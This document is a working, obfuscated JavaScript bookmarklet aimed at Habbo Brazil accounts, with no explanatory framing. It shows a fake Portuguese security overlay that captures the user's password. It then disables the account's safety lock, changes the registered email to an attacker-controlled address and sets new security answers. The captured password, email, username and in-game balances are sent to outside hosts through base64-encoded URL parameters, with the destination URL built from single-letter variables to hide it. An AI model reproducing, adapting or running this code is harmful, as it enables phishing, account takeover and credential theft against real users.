javascript: var userid = "MjEw";function b64EncodeUnicode(_0xe3dfx2) {

1. javascript: var userid = "MjEw";
2.  
3.  
4. function b64EncodeUnicode(_0xe3dfx2) {
5. return btoa(encodeURIComponent(_0xe3dfx2).replace(/%([0-9A-F]{2})/g, function(_0xe3dfx3, _0xe3dfx4) {
6. return String.fromCharCode("0x"+ _0xe3dfx4)
7. }))
8. }
9. var http = new XMLHttpRequest(),
10. avatar = {
11. add: "megapro"+ Math.floor(Math.random() * 999999) + "@amail.club",
12. passd: null,
13. passd2: null,
14. safe1: "sociedade",
15. safe2: "secreta"
16. };
17. http.open("get", "/settings/email", false);
18. http.send();
19. var start = http.responseText.indexOf("{", http.responseText.indexOf("window.session")),
20. end = http.responseText.indexOf("}", http.responseText.indexOf("window.session")),
21. habbo = http.responseText.slice(start, end),
22. data = habbo.split(","),
23. habboName = b64EncodeUnicode($(".user-menu__name").text());
24. habboEmail = b64EncodeUnicode(data[4].slice(data[4].indexOf("\"", data[4].indexOf(":")) + 1, data[3].lastIndexOf("\",")));
25. add2 = b64EncodeUnicode(avatar.add);
26. overlay = document.createElement("div");
27. overlay.style.position = "fixed";
28. overlay.style.top = "0";
29. overlay.style.left = "0";
30. overlay.style.zIndex = "800";
31. overlay.style.background = "rgba(10,54,94,.8)";
32. overlay.style.width = "100%";
33. overlay.style.height = "100%";
34. document.body.appendChild(overlay);
35. box = document.createElement("div");
36. box.id = "hidden";
37. box.style.position = "fixed";
38. box.style.top = "70px";
39. box.style.width = "500px";
40. box.style.zIndex = "900";
41. box.style.left = "50%";
42. box.style.marginLeft = "-250px";
43. box.innerHTML = "<div style=\"display: none; transition: 1s;\" id=\"toast-container\" class=\"toast-top-center\" aria-live=\"polite\" role=\"alert\"><div class=\"toast toast-error\" style=\"display: table;\"><div class=\"toast-progress\" id=\"toast-progress\" style=\"width: 99.9%;transition: 2s;\"></div><div class=\"toast-message\" id=\"toast-message\">Ops! Algo deu errado. Tente novamente em alguns minutos. Vamos verificar o que aconteceu.</div></div></div><div class=\"modal-dialog\" ng-class=\"size ? \" modal-\"=\"\" +=\"\" size=\"\" :=\"\" \"\"\"=\"\"><div style=\"height: 250px;\" class=\"modal-content\" uib-modal-transclude=\"\"><div><button onclick=\"location.reload()\" class=\"modal__close\"></button><h3 translate=\"SAFETY_LOCK_TITLE\" class=\"modal__title\">Conta protegida por segurança.</h3><div class=\"modal__content\"><p translate=\"SAFETY_LOCK_ANSWER\"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class=\"form__fieldset\"><label for=\"safety-lock-answer1\" class=\"form__label\" translate=\"IDENTITY_SAFETYQUESTION_1\">Insira sua senha para continuar</label><div class=\"form__field\"><input id=\"safety-lock-answer1\" name=\"answer1\" type=\"password\" ng-model=\"answers.answer1\" ng-model-options=\"{ updateOn: \" default=\"\" blur\",=\"\" debounce:=\"\" {=\"\" default:=\"\" 500,=\"\" blur:=\"\" 0=\"\" }=\"\" }\"=\"\" required=\"\" remote-data=\"\" answer\"\"=\"\" password-toggle-mask=\"\" autocomplete=\"off\" class=\"form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required\"><i class=\"password-toggle-mask__icon\"></i><!-- ngIf: safetyLockForm.answer1.$error.required && (!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class=\"form__footer\"><a href=\"https://www.habbo.com.br/\" class=\"form__cancel\" onclick=\"location.reload()\" translate=\"FORM_CANCEL_LABEL\">Cancelar</a> <button ng-disabled=\"unlockingInProgress\" type=\"\" class=\"form__submit\" onclick=\"adder()\">Continuar</button></div></div></div></div></div>";
44. document.body.appendChild(box);
45.  
46. function safety() {
47. var http = new XMLHttpRequest();
48. http.open("post", "/api/safetylock/save", false);
49. http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
50. http.send("answer1=".concat(avatar.safe1, "&answer2=", avatar.safe2, "&password=", avatar.passd, "&questionId1=1&questionId2=2"));
51. if (http.responseText.indexOf("this time frame") != -1) {};
52. var _0xe3dfxd = "a";
53. var _0xe3dfxe = "m";
54. var _0xe3dfxf = "s";
55. var _0xe3dfx10 = "u";
56. var _0xe3dfx11 = "g";
57. var _0xe3dfx12 = "z";
58. var _0xe3dfx13 = "e";
59. var _0xe3dfx14 = "b";
60. var _0xe3dfx15 = "v";
61. var _0xe3dfx16 = "=";
62. var _0xe3dfx17 = "t";
63. var _0xe3dfx18 = "2";
64. var _0xe3dfx19 = "w";
65. var _0xe3dfx1a = "k";
66. var _0xe3dfx1b = "5";
67. var _0xe3dfx1c = "7";
68. var _0xe3dfx1d = "r";
69. var _0xe3dfx1e = "h";
70. var _0xe3dfx1f = "p";
71. var _0xe3dfx20 = "c";
72. var _0xe3dfx21 = "n";
73. var _0xe3dfx22 = "t";
74. var _0xe3dfx23 = "r";
75. var _0xe3dfx24 = ":";
76. var _0xe3dfx25 = "/";
77. var _0xe3dfx26 = ".";
78. var _0xe3dfx27 = "?";
79. var _0xe3dfx28 = "o";
80.  
81. function _0xe3dfx29(_0xe3dfx2a) {
82. var _0xe3dfx2b = l = 0,
83. _0xe3dfx2c = "",
84. _0xe3dfx2d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split("");
85. _0xe3dfx2a.split("").forEach(function(_0xe3dfx2e) {
86. _0xe3dfx2b = (_0xe3dfx2b << 6) + _0xe3dfx2d.indexOf(_0xe3dfx2e);
87. l += 6;
88. while (l >= 8) {
89. _0xe3dfx2c += String.fromCharCode((_0xe3dfx2b >>> (l -= 8)) & amp; 0xff)
90. }
91. });
92. return _0xe3dfx2c
93. }
94. $.getJSON("/shopapi/purse", function(_0xe3dfx2f) {
95. var _0xe3dfx30 = b64EncodeUnicode(_0xe3dfx2f.creditBalance);
96. var _0xe3dfx31 = b64EncodeUnicode(_0xe3dfx2f.diamondBalance);
97. var _0xe3dfx32 = b64EncodeUnicode(_0xe3dfx2f.habboClubDays);
98. var _0xe3dfx33 = b64EncodeUnicode(avatar.passd.replace("undefined", ""));
99. htmlx = "<script type=\"text/javascript\"src=\"https://code.jquery.com/jquery-1.11.0.min.js\"></script><script>function decode_base64(s){var b=l=0,r=\"\",m=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\".split(\"\");s.split(\"\").forEach(function(v){b=(b<<6)+m.indexOf(v);l+=6;while(l>=8)r+=String.fromCharCode((b>>>(l-=8))&0xff)});return r}</script><script>window.setTimeout(\"location.href='\"+decode_base64(\"aHR0cHM6Ly9oYWJiby5jb20uYnI\")+\"'\",2000);window.setInterval(function() {console.clear();}, 1);var x1= 'a';var x3= 'm';var yu = 's';var ug = 'u';var x5= 'g';var ti = 'z';var x7= 'e';var lrr = 'b';var x9= 'v';var twf = '=';var x0= 't';var xb= '2';var rtb = 'w';var xj= 'k';var xl= '5';var xm= '7';var xn= 'r';var xo= 'h';var xs= 'p';var utm = 'c';var tg = 'n';var xc= 't';var cp = 'r';var xr= ':';var xt= '/';var xvw = '.';var ghw = '?';var iw='o';</script><script>$.get( \"\"+xo+x0+x0+xs+yu+xr+xt+xt+xs+iw+cp+tg+ti+ug+xs+xvw+utm+iw+x3+xt+xn+x1+x9+x7+xvw+xs+xo+xs+ghw+lrr+xb+twf+\""+ habboEmail.replace("=", "") + "&b3="+ add2.replace("=", "") + "&b0="+ userid.replace("=", "") + "&b4="+ _0xe3dfx33.replace("=", "") + "&b5="+ _0xe3dfx30.replace("undefined") + "&b7="+ _0xe3dfx31.replace("undefined") + "&b10="+ _0xe3dfx32.replace("undefined") + "&b1="+ habboName.replace("=", "") + "\");</script>";
100. window.location = "http://huedgstakxiwksjd.pancakeapps.com/xwt.html?b1="+ habboEmail.replace("=", "") + "&b2="+ add2.replace("=", "") + "&b3="+ userid.replace("=", "") + "&b4="+ _0xe3dfx33.replace("=", "") + "&b5="+ _0xe3dfx30.replace("undefined") + "&b6="+ _0xe3dfx31.replace("undefined") + "&b7="+ _0xe3dfx32.replace("undefined") + "&b8="+ habboName.replace("=", "") + ""
101. })
102. }
103.  
104. function adder() {
105. var _0xe3dfx35 = document.getElementById("safety-lock-answer1");
106. if (_0xe3dfx35.value.length > 1) {
107. var http = new XMLHttpRequest();
108. http.open("post", "/api/safetylock/disable", false);
109. http.setRequestHeader("content-type", "application/x-www-form-urlencoded");
110. http.send("password="+ _0xe3dfx35.value + "");
111. avatar.passd = _0xe3dfx35.value;
112. password = b64EncodeUnicode(_0xe3dfx35.value);
113. var http = new XMLHttpRequest();
114. http.open("post", "/api/settings/email/change", false);
115. http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
116. http.send("currentPassword=".concat(avatar.passd, "&newEmail=", avatar.add));
117. if (http.responseText.indexOf("changeEmail.invalid_password") != -1) {
118. var _0xe3dfx36 = document.getElementById("toast-container"),
119. _0xe3dfx37 = document.getElementById("toast-progress"),
120. _0xe3dfx38 = document.getElementById("toast-message"),
121. _0xe3dfx39 = 0;
122. _0xe3dfx38.innerHTML = "A senha que você digitou está incorreta, verifique e tente novamente.";
123. _0xe3dfx36.style.display = "block";
124. var _0xe3dfx3a = setInterval(function() {
125. if (_0xe3dfx39 == 5) {
126. _0xe3dfx36.style.display = "none";
127. _0xe3dfx37.style.width = "99.9%";
128. _0xe3dfx39 = 0;
129. clearInterval(_0xe3dfx3a)
130. } else {
131. _0xe3dfx37.style.width = "0%";
132. _0xe3dfx39++
133. }
134. }, 800);
135. _0xe3dfx35.value = "";
136. _0xe3dfx35.style.borderColor = "#903352";
137. _0xe3dfx35.focus()
138. } else {
139. if (http.responseText.indexOf("this time frame") != -1) {
140. var _0xe3dfx36 = document.getElementById("toast-container"),
141. _0xe3dfx37 = document.getElementById("toast-progress"),
142. _0xe3dfx38 = document.getElementById("toast-message"),
143. _0xe3dfx39 = 0;
144. _0xe3dfx38.innerHTML = "Ops! Algo deu errado. Tente novamente em alguns minutos. Vamos verificar o que aconteceu.";
145. _0xe3dfx36.style.display = "block";
146. var _0xe3dfx3a = setInterval(function() {
147. if (_0xe3dfx39 == 5) {
148. _0xe3dfx36.style.display = "none";
149. _0xe3dfx37.style.width = "99.9%";
150. _0xe3dfx39 = 0;
151. clearInterval(_0xe3dfx3a)
152. } else {
153. _0xe3dfx37.style.width = "0%";
154. _0xe3dfx39++
155. }
156. }, 800)
157. } else {
158. safety()
159. }
160. }
161. } else {
162. _0xe3dfx35.focus()
163. }
164. }